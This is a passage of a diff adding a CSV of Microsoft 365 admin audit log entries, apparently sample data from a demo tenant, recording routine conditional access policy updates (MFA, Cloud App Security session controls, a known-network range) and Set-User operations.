+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/9/2020 2:58:46 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-09T02:58:45Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/9/2020 2:58:45 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-09T02:58:46Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/9/2020 2:58:46 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-09T02:58:45Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/9/2020 2:58:45 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-09T02:58:46Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/9/2020 2:58:46 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-05-09T02:58:45Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/9/2020 2:58:45 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-09T02:58:45Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/9/2020 2:58:45 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-09T02:58:45Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/9/2020 2:58:45 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-09T02:58:45Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/9/2020 2:58:45 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-09T02:58:45Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/9/2020 2:58:45 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-09T02:58:45Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/9/2020 2:58:45 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-09T02:58:46Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/9/2020 2:58:45 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-09T02:58:45Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/9/2020 2:58:45 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-09T18:22:43Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-11T02:02:00Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-11T01:58:15Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/11/2020 1:58:15 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-11T01:58:15Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/11/2020 1:58:15 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-11T01:58:15Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/11/2020 1:58:15 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-11T01:58:15Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/11/2020 1:58:15 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-11T01:58:15Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/11/2020 1:58:15 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-05-11T01:58:15Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/11/2020 1:58:15 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-11T01:58:15Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/11/2020 1:58:15 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-11T01:58:15Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/11/2020 1:58:15 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-11T01:58:15Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/11/2020 1:58:15 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-11T01:58:15Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/11/2020 1:58:15 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-11T01:58:15Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/11/2020 1:58:15 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-11T01:58:15Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
